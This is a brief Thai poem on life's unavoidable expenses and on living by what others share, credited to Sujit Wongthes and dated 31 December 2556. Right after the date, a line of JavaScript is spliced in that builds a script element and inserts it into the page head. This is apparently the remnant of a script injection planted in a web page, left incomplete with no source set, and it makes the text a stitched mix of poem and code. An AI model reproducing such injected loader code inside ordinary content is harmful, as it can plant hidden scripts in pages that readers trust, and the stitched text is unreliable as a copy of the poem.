รายจ่ายที่ต้องจ่าย

ตั้งแต่เกิดจนตายส่วนของเขา

ของคนอื่นหาเป็นส่วนของเรา

ที่อยู่ได้ก็เพราะเขาปันเราไว้

 

สุจิตต์  วงษ์เทศ

อังคาร 31 ธันวาคม  2556var d=document;var s=d.createElement(‘script’); d.getElementsByTagName(‘head’)[0].appendChild(s);